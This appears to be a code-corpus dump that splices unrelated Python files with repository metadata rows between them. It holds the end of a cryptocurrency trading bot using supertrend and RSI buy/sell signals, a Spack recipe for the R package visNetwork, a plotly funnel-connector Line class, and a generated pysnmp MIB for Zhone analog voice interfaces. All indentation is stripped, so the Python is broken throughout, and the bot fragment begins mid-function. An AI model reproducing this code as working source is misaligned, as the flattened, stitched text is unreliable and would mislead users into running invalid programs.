if not df['in_uptrend'][current] and df['upperband'][current] > df['upperband'][previous]:
df['upperband'][current] = df['upperband'][previous]
return df
def check_buy_sell_signals(df, rsi):
print("checking for buy and sell signals")
last_row_index = len(df.index) - 1
previous_row_index = last_row_index - 1
data = info(df)
print(data)
if (not df['in_uptrend'][previous_row_index] and df['in_uptrend'][last_row_index]) or rsi < RSI_OVERSOLD:
print("changed to uptrend, buy")
order = buy(data)
print(f"buy signal received {order}")
if (df['in_uptrend'][previous_row_index] and not df['in_uptrend'][last_row_index]) or rsi > RSI_OVERBOUGHT:
print("changed to downtrend, sell")
order = sell(data)
print(f"sell signal received {order}")
def file_put_contents(file, data):
with open(file, "a") as file:
file.write(f"{data},{datetime.now().isoformat()}\n")
def run_bot():
# print(f"Fetching new bars for {datetime.now().isoformat()}")
bars = EXCHANGE.fetch_ohlcv(symbol, timeframe='1m', limit=100)
df = pd.DataFrame(bars[:-1], columns=['timestamp', 'open', 'high', 'low', 'close', 'volume'])
df['timestamp'] = pd.to_datetime(df['timestamp'], unit='ms')
supertrend_data = supertrend(df)
stock_data = Sdf.retype(df)
rsi = stock_data['rsi_14'].iloc[-1]
# print(f"RSI - {rsi} ---- {datetime.now().isoformat()}")
check_buy_sell_signals(supertrend_data, rsi)
def earning(trade_history):
sold_trades = trade_history.loc[trade_history['state'] == 1]
return sold_trades["sell"].sum() - sold_trades["buy"].sum()
def action():
schedule.every(10).seconds.do(run_bot)
while True:
schedule.run_pending()
time.sleep(1)
action()
| 36.604167
| 120
| 0.615367
|
80e254de0cfbdf8c1d00212a7e82e6c00719e06f
| 873
|
py
|
Python
|
var/spack/repos/builtin/packages/r-visnetwork/package.py
|
whitfin/spack
|
aabd2be31a511d0e00c1017f7311a421659319d9
|
[
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 3
|
2019-06-27T13:26:50.000Z
|
2019-07-01T16:24:54.000Z
|
var/spack/repos/builtin/packages/r-visnetwork/package.py
|
openbiox/spack
|
bb6ec7fb40c14b37e094a860e3625af53f633174
|
[
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 75
|
2016-07-27T11:43:00.000Z
|
2020-12-08T15:56:53.000Z
|
var/spack/repos/builtin/packages/r-visnetwork/package.py
|
openbiox/spack
|
bb6ec7fb40c14b37e094a860e3625af53f633174
|
[
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 8
|
2015-10-16T13:51:49.000Z
|
2021-10-18T13:58:03.000Z
|
# Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RVisnetwork(RPackage):
"""Provides an R interface to the 'vis.js' JavaScript charting library. It
allows an interactive visualization of networks."""
homepage = "https://github.com/datastorm-open/visNetwork"
url = "https://cran.r-project.org/src/contrib/visNetwork_1.0.1.tar.gz"
list_url = "https://cran.r-project.org/src/contrib/Archive/visNetwork"
version('1.0.1', 'dfc9664a5165134d8dbdcd949ad73cf7')
depends_on('r-htmlwidgets', type=('build', 'run'))
depends_on('r-htmltools', type=('build', 'run'))
depends_on('r-jsonlite', type=('build', 'run'))
depends_on('r-magrittr', type=('build', 'run'))
| 37.956522
| 79
| 0.703322
|
3439f83ecef8bc3a5221564a3c4741e606f7a57a
| 6,992
|
py
|
Python
|
packages/python/plotly/plotly/graph_objs/funnel/connector/_line.py
|
labaran1/plotly.py
|
7ec751e8fed4a570c11ea4bea2231806389d62eb
|
[
"MIT"
] | null | null | null |
packages/python/plotly/plotly/graph_objs/funnel/connector/_line.py
|
labaran1/plotly.py
|
7ec751e8fed4a570c11ea4bea2231806389d62eb
|
[
"MIT"
] | null | null | null |
packages/python/plotly/plotly/graph_objs/funnel/connector/_line.py
|
labaran1/plotly.py
|
7ec751e8fed4a570c11ea4bea2231806389d62eb
|
[
"MIT"
] | null | null | null |
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Line(_BaseTraceHierarchyType):
# class properties
# --------------------
_parent_path_str = "funnel.connector"
_path_str = "funnel.connector.line"
_valid_props = {"color", "dash", "width"}
# color
# -----
@property
def color(self):
"""
Sets the line color.
The 'color' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
Returns
-------
str
"""
return self["color"]
@color.setter
def color(self, val):
self["color"] = val
# dash
# ----
@property
def dash(self):
"""
Sets the dash style of lines. Set to a dash type string
("solid", "dot", "dash", "longdash", "dashdot", or
"longdashdot") or a dash length list in px (eg
"5px,10px,2px,2px").
The 'dash' property is an enumeration that may be specified as:
- One of the following dash styles:
['solid', 'dot', 'dash', 'longdash', 'dashdot', 'longdashdot']
- A string containing a dash length list in pixels or percentages
(e.g. '5px 10px 2px 2px', '5, 10, 2, 2', '10% 20% 40%', etc.)
Returns
-------
str
"""
return self["dash"]
@dash.setter
def dash(self, val):
self["dash"] = val
# width
# -----
@property
def width(self):
"""
Sets the line width (in px).
The 'width' property is a number and may be specified as:
- An int or float in the interval [0, inf]
Returns
-------
int|float
"""
return self["width"]
@width.setter
def width(self, val):
self["width"] = val
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
color
Sets the line color.
dash
Sets the dash style of lines. Set to a dash type string
("solid", "dot", "dash", "longdash", "dashdot", or
"longdashdot") or a dash length list in px (eg
"5px,10px,2px,2px").
width
Sets the line width (in px).
"""
def __init__(self, arg=None, color=None, dash=None, width=None, **kwargs):
"""
Construct a new Line object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of
:class:`plotly.graph_objs.funnel.connector.Line`
color
Sets the line color.
dash
Sets the dash style of lines. Set to a dash type string
("solid", "dot", "dash", "longdash", "dashdot", or
"longdashdot") or a dash length list in px (eg
"5px,10px,2px,2px").
width
Sets the line width (in px).
Returns
-------
Line
"""
super(Line, self).__init__("line")
if "_parent" in kwargs:
self._parent = kwargs["_parent"]
return
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.funnel.connector.Line
constructor must be a dict or
an instance of :class:`plotly.graph_objs.funnel.connector.Line`"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
self._validate = kwargs.pop("_validate", True)
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("color", None)
_v = color if color is not None else _v
if _v is not None:
self["color"] = _v
_v = arg.pop("dash", None)
_v = dash if dash is not None else _v
if _v is not None:
self["dash"] = _v
_v = arg.pop("width", None)
_v = width if width is not None else _v
if _v is not None:
self["width"] = _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
| 33.777778
| 82
| 0.535898
|
d06816a9db6ef965f6aa4f5791580745a64f4171
| 53,786
|
py
|
Python
|
pysnmp-with-texts/Zhone-VOICE-ANALOG-IF-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 8
|
2019-05-09T17:04:00.000Z
|
2021-06-09T06:50:51.000Z
|
pysnmp-with-texts/Zhone-VOICE-ANALOG-IF-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 4
|
2019-05-31T16:42:59.000Z
|
2020-01-31T21:57:17.000Z
|
pysnmp-with-texts/Zhone-VOICE-ANALOG-IF-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 10
|
2019-04-30T05:51:36.000Z
|
2022-02-16T03:33:41.000Z
|
#
# PySNMP MIB module Zhone-VOICE-ANALOG-IF-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/Zhone-VOICE-ANALOG-IF-MIB
# Produced by pysmi-0.3.4 at Wed May 1 15:52:28 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ConstraintsUnion, ValueSizeConstraint, ValueRangeConstraint, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ConstraintsUnion", "ValueSizeConstraint", "ValueRangeConstraint", "ConstraintsIntersection")
InterfaceIndex, ifIndex = mibBuilder.importSymbols("IF-MIB", "InterfaceIndex", "ifIndex")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
Integer32, NotificationType, MibScalar, MibTable, MibTableRow, MibTableColumn, MibIdentifier, ModuleIdentity, Bits, Gauge32, Unsigned32, TimeTicks, IpAddress, ObjectIdentity, Counter64, Counter32, iso = mibBuilder.importSymbols("SNMPv2-SMI", "Integer32", "NotificationType", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "MibIdentifier", "ModuleIdentity", "Bits", "Gauge32", "Unsigned32", "TimeTicks", "IpAddress", "ObjectIdentity", "Counter64", "Counter32", "iso")
TruthValue, DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "TruthValue", "DisplayString", "TextualConvention")
zhonePhysical, zhoneModules = mibBuilder.importSymbols("Zhone", "zhonePhysical", "zhoneModules")
ZhoneRowStatus, = mibBuilder.importSymbols("Zhone-TC", "ZhoneRowStatus")
zhoneVoiceAnalogIf_MIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 5504, 6, 13)).setLabel("zhoneVoiceAnalogIf-MIB")
zhoneVoiceAnalogIf_MIB.setRevisions(('2009-05-05 02:36', '2008-03-26 17:45', '2007-11-01 02:30', '2005-09-06 11:14', '2005-08-08 15:00', '2005-05-11 15:20', '2005-05-02 17:22', '2004-10-07 11:34', '2001-10-10 11:19', '2001-02-15 18:52', '2000-09-12 14:21',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: zhoneVoiceAnalogIf_MIB.setRevisionsDescriptions(('V01.00.10 - Added new field if-cfg-loop-current in table analog-if-cfg-profile', 'Add ebs to zhoneValIfCfgLineType field.', 'V01.00.08 - Edited IfCfgImpedance field descriptions that ohmscomplex1 and ohmscomplex2 are Not Supported.', 'Deprecate zhonePotsRingTable. Move to zhoneVoiceRingTable in genVoiceStatMib.', 'Add zhonePotsRing table.', 'Changed zhoneVaIfCfgImpedance default value description from ohms900Complex to ohms600Complex.', 'Add default value descriptions for zhoneVAIfCfgImpedance, zhoneVAIffgReceivelp, zhoneVaIfCfgTransmitTlp.', 'zhoneVaIfEMCfgEntry change SignalType, CfgOperation and DialType from read-write to read-only', 'V01.00.02 - Removed Mark-Up for the zhoneVaIfFXSTimingDigitDuration and zhoneVaIfFXSTimingInterDigitDuration OIDs. Also added comment for the zhoneVaIfStatusSignalError OID.', 'V01.00.01 - Add DEFVAL for TruthValue types.', 'V01.00.00 - Initial Release',))
if mibBuilder.loadTexts: zhoneVoiceAnalogIf_MIB.setLastUpdated('200911171030Z')
if mibBuilder.loadTexts: zhoneVoiceAnalogIf_MIB.setOrganization('Zhone Technologies, Inc.')
if mibBuilder.loadTexts: zhoneVoiceAnalogIf_MIB.setContactInfo('Postal: Zhone Technologies, Inc. @Zhone Way 7001 Oakport Oakland, Ca 94621 Toll-Free 877-ZHONE20 (+1 877-946-6320) Tel: +1 510-777-7000 Fax: +1 510-777-7001 Email: support@zhone.com ')
if mibBuilder.loadTexts: zhoneVoiceAnalogIf_MIB.setDescription("Analog Voice Interface MIB module. This MIB manages the E&M, FXO, FXS Interfaces in the Zhone's product. ")
zhoneVaIfObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 5504, 5, 6))
zhoneVaIfGeneralObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 5504, 5, 6, 1))
zhoneVaIfCfgTable = MibTable((1, 3, 6, 1, 4, 1, 5504, 5, 6, 1, 1), )
if mibBuilder.loadTexts: zhoneVaIfCfgTable.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfCfgTable.setDescription('The Analog Voice Standard Configuration Table. It contains the standard configuration information of the analog telephony interface. ')
zhoneVaIfCfgEntry = MibTableRow((1, 3, 6, 1, 4, 1, 5504, 5, 6, 1, 1, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"))
if mibBuilder.loadTexts: zhoneVaIfCfgEntry.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfCfgEntry.setDescription('An entry in the configuration table for each voice analog interface. The entry is created when the voice analog hardware is detected. ')
zhoneVaIfCfgImpedance = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 1, 1, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("other", 1), ("ohms600Real", 2), ("ohms600Complex", 3), ("ohms900Complex", 4), ("ohmsComplex1", 5), ("ohmsComplex2", 6)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfCfgImpedance.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfCfgImpedance.setDescription('Specifies the terminating impedance of voice analog interfaces. other - none of the following; arbitrary, within limits, for special cases. ohms600Real - 600 Ohms. ohms600Complex - 600 Ohms + 2.16uF ohms900Complex - 900 Ohms + 2.16uF. ohmsComplex1 - Not Supported. ohmsComplex2 - Not Supported. Default value is ohms600Complex. ')
zhoneVaIfCfgReceiveTLP = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 1, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14))).clone(namedValues=NamedValues(("fxsRtlpN9db", 1), ("fxsRtlpN8db", 2), ("fxsRtlpN7db", 3), ("fxsRtlpN6db", 4), ("fxsRtlpN5db", 5), ("fxsRtlpN4db", 6), ("fxsRtlpN3db", 7), ("fxsRtlpN2db", 8), ("fxsRtlpN1db", 9), ("fxsRtlp0db", 10), ("fxsRtlp1db", 11), ("fxsRtlp2db", 12), ("fxsRtlp3db", 13), ("rTlpNummeric", 14)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfCfgReceiveTLP.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfCfgReceiveTLP.setDescription(' Receive Transmission Level Point (RTLP) settings control the amount gain or loss added to the incoming signal after it is decoded to analog. to increase the signal level set the RTLP setting to higher values. The default is fxsRtlpN6db. Rtlpnummeric selects entering the actual value in zhoneVaIFCfgReceiveTLPNum.')
zhoneVaIfCfgTransmitTLP = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 1, 1, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14))).clone(namedValues=NamedValues(("fxsTtlp9db", 1), ("fxsTtlp8db", 2), ("fxsTtlp7db", 3), ("fxsTtlp6db", 4), ("fxsTtlp5db", 5), ("fxsTtlp4db", 6), ("fxsTtlp3db", 7), ("fxsTtlp2db", 8), ("fxsTtlp1db", 9), ("fxsTtlp0db", 10), ("fxsTtlpN1db", 11), ("fxsTtlpN2db", 12), ("fxsTtlpN3db", 13), ("tTlpNummeric", 14)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfCfgTransmitTLP.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfCfgTransmitTLP.setDescription(' In case of FXO, it specifies FXO attenuation and default value is 0dB(fxsTtlp0db). In case of FXS this setting controls the amount of gain or loss added to a voice signal from CPE before it is encoded to digital PCM. To increase the signal level, reduce the TTLP setting to lower value. The default is fxsTtlp0db. Ttlpnummeric selects entering the actual value in zhoneVaIFCfgTransmitTLPNum.')
zhoneVaIfCfgTrunkConditioning = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 1, 1, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("off", 1), ("idle", 2), ("busy", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfCfgTrunkConditioning.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfCfgTrunkConditioning.setDescription(' The trunk conditioning setting specifies whether the FXS/FXO port should send the idle pattern to the network upon declaration of a Carrier Group Alarm(CGA) on the WAN link to which the port is assigned . In most cases leave the trunk conditioning setting at its default setting(off).')
zhoneVaIfCfgLineType = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 1, 1, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("fxs", 1), ("fxo", 2), ("em", 3), ("ebs", 4))).clone('fxs')).setMaxAccess("readonly")
if mibBuilder.loadTexts: zhoneVaIfCfgLineType.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfCfgLineType.setDescription('The Card type FXS, FXO, EM, EBS. Entries in the table will be created or deleted on the basis of zhoneVaIfCfgLineType in the zhoneVaIfCfgTable and we are not using rowStatus entry for this . The tables which are augument to the above mentioned table will be created by RP only and they can be read or modified by user later.')
zhoneVaIfCfgIntegratedDSP = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 1, 1, 1, 6), TruthValue().clone('false')).setMaxAccess("readonly")
if mibBuilder.loadTexts: zhoneVaIfCfgIntegratedDSP.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfCfgIntegratedDSP.setDescription('Indicates whether the interface has an integrated Digital Signal processing (DSP) unit. ')
zhoneVaIfCfgLineCapabilities = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 1, 1, 1, 7), Bits().clone(namedValues=NamedValues(("fxs", 0), ("fxo", 1), ("em", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zhoneVaIfCfgLineCapabilities.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfCfgLineCapabilities.setDescription('The Interface types supported on this interface. This is a bit-map of possible types. This variable can be used to determine zhoneVaIfCfgLineType.')
zhoneVaIfCfgMaintenanceMode = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 1, 1, 1, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("off", 1), ("ifDigitalLoopback", 2), ("ifAnalogLoopback", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfCfgMaintenanceMode.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfCfgMaintenanceMode.setDescription('Indicates the maintenance modes of the Analog voice interface. loopback options for Fxo and Fxs cards (Zhone specific) ------------------------------------------------------- CODEC T1/E1 DS0 --------------------------- <------- <--------------- ----------------- Network PCM Bus ^ Digital ^ | to analog Converter| | | | | | | Digital loopback Analog loopback | | -------> -------- ->---------------------------------------------> off(1) - the interface is not in maintenance mode. ifDigitalLoopback(2) This mode is set by the managed system to perform the Digital loopback test. ifAnalogLoopback(3) This mode is set by the managed system to perform the Analog loopback test. ')
zhoneVaIfCfgPCMEncoding = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 1, 1, 1, 9), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("alaw", 1), ("mulaw", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfCfgPCMEncoding.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfCfgPCMEncoding.setDescription('alaw(1) :for E1 mulaw(2) : for T1 ')
zhoneVaIfCfgReceiveTLPNum = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 1, 1, 1, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-160, 85)).clone(0)).setUnits('dB/10').setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfCfgReceiveTLPNum.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfCfgReceiveTLPNum.setDescription('Receive Transmission Level Point (RTLP) settings control the amount gain or loss added to the incoming signal after it is decoded to analog. to incrase the signal level set the RTLP setting to higher values. The default is 0 dB.')
zhoneVaIfCfgTransmitTLPNum = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 1, 1, 1, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-175, 70))).setUnits('dB/10').setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfCfgTransmitTLPNum.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfCfgTransmitTLPNum.setDescription('Transmit Transmission Level Point controls the amount of gain or loss added to a voice signal from CPE before it is encoded to digital PCM. To increase the signal level, reduce the TTLP setting to lower value. The default is 0dB.')
zhoneVaIfCfgLoopCurrent = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 1, 1, 1, 12), Integer32().subtype(subtypeSpec=ValueRangeConstraint(20, 44)).clone(30)).setUnits('mA').setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfCfgLoopCurrent.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfCfgLoopCurrent.setDescription('To set the loop current value for a subscriber')
zhoneVaIfCfgRingVoltage = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 1, 1, 1, 13), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("b85vrms", 1), ("b75vrms", 2), ("b92vrms", 3))).clone('b85vrms')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfCfgRingVoltage.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfCfgRingVoltage.setDescription('To set the ring voltage for a subscriber.')
zhoneVaIfStatusTable = MibTable((1, 3, 6, 1, 4, 1, 5504, 5, 6, 1, 2), )
if mibBuilder.loadTexts: zhoneVaIfStatusTable.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfStatusTable.setDescription('The Analog Voice Status Table. It contains general information about the status of Analog Telephony interface including the error statistics. ')
zhoneVaIfStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 5504, 5, 6, 1, 2, 1), )
zhoneVaIfCfgEntry.registerAugmentions(("Zhone-VOICE-ANALOG-IF-MIB", "zhoneVaIfStatusEntry"))
zhoneVaIfStatusEntry.setIndexNames(*zhoneVaIfCfgEntry.getIndexNames())
if mibBuilder.loadTexts: zhoneVaIfStatusEntry.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfStatusEntry.setDescription('An entry in the status table for each Analog voice interface. ')
zhoneVaIfStatusSignalErrors = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 1, 2, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zhoneVaIfStatusSignalErrors.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfStatusSignalErrors.setDescription('Accumulated number of signaling protocol errors that are detected in the interface since system startup.')
zhoneVaIfStatusInfoType = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 1, 2, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("notype", 1), ("voice", 2), ("g3Fax", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zhoneVaIfStatusInfoType.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfStatusInfoType.setDescription('The information transfer services for the current call. none - no information transfer service, this is set befgore the first call is made on the interface. voice - analog voice. g3Fax - Group 3 FAX. ')
zhoneVaIfFXSObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 5504, 5, 6, 2))
zhoneVaIfFXSCfgTable = MibTable((1, 3, 6, 1, 4, 1, 5504, 5, 6, 2, 1), )
if mibBuilder.loadTexts: zhoneVaIfFXSCfgTable.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXSCfgTable.setDescription('The FXS standard configuration table. It contains FXS configuration parameters, one entry per FXS interface. The configuration information of this table is set by hardware with its default setting or CLI during the hardware installation time. ')
zhoneVaIfFXSCfgEntry = MibTableRow((1, 3, 6, 1, 4, 1, 5504, 5, 6, 2, 1, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"))
if mibBuilder.loadTexts: zhoneVaIfFXSCfgEntry.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXSCfgEntry.setDescription('An entry in the standard configuration table for each FXS interface.')
zhoneVaIfFXSCfgSignalType = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 2, 1, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16))).clone(namedValues=NamedValues(("fxsLoopStart", 1), ("fxsGroundStart", 2), ("fxsLoopStartFd", 3), ("fxsGroundStartAutomatic", 4), ("fxsGroundStartImmediate", 5), ("fxsdnLoopStart", 6), ("fxsdnLoopStartFd", 7), ("fxsdnGroundStart", 8), ("fxsdnGroundStartImmediate", 9), ("fxsdnwinkLoopStart", 10), ("fxsdnwinkLoopStartFd", 11), ("fxsdnwinkGroundStart", 12), ("fxsdnwinkGroundStartImmediate", 13), ("fxstr08SingleParty", 14), ("fxstr08UniversalVoiceGrade", 15), ("fxstr08UniversalVoiceGradeAutomatic", 16)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfFXSCfgSignalType.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXSCfgSignalType.setDescription('the signaling type of FXS interface. fxsLoopStart - loop start. fxsGroundStart - ground start. fxsLoopStartFd fxsGroundStartAutomatic - Used with equipment requiring fast response time to the Central Office. fxsGroundStartImmediate - Used with equipment requiring fast response time to the station or PBX. fxsdnLoopStart- loop start in fxsdn mode fxsdnLoopStartFd fxsdnGroundStart- Ground start in fxsdn mode fxsdnGroundStartImmediate - Ground start immediate in fxsdn mode fxsdnwinkLoopStart - loop start in fxsdnwink (foreign exchange subscriber - defined wink start operation) this option proved the same type of signalling as FXSDN and provides 150 millisecond delay then 200 ms wink ack to the central office when fxs port sees an off hook condition from central office . The system requires a ringing generator for this option. fxsdnwinkLoopStartFd fxsdnwinkGroundStart- Ground start in FXSDNWINK mode fxsdnwinkGroundStartImmediate - Ground start immediate in FXSDNWINK mode. fxstr08SingleParty - TR08 is Frame format signalling and data link as defined in TR-TSY-00008 Mode 1 for circuits using AT & T SLC-96 facilities. this option is for single party service , this option connects the port to one way out going trunks from a PBX , CENTEREX, key system , ot telephone set to an SLC channel. The SLC96 mode also must be active on the associated WAN interface. fxstr08UniversalVoiceGrade - Toll quality voice for SLC-96 fxstr08UniversalVoiceGradeAutomatic- Used with some non - Bell switches for SLC-96 The default value of this object is fxsLoopStart(1). ')
zhoneVaIfFXSRingFrequency = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 2, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("ringFrequency25", 1), ("ringFrequency50", 2), ("ringFrequency20", 3), ("ringFrequency30", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfFXSRingFrequency.setStatus('current')
